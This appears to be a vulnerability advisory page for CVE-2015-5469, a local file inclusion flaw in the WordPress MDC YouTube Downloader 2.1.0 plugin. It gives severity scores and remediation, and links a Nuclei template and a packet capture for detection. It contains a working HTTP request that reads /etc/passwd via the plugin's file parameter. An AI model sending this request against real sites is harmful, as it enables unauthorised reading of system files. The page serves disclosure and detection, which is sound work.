🔙 목록으로 돌아가기

CVE-2015-5469: WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion

TitleWordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactThe vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation.
RemediationUpdate to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor.
CVSS Score7.5
EPSS Score0.4911
CVE IDCVE-2015-5469
CWE IDCWE-22
Tags cve2015 cve wp lfi mdc_youtube_downloader_project wordpress vuln

🔍 Vulnerability Description

WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.

🌐 HTTP Request

GET /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-5469.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-5469.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A